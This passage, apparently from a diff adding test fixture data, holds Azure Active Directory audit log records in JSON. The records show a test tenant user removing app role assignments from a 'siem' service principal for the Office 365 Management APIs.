"Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "7bca6665-4d58-4df9-bd34-4d92e1fc63aa"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735117"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, 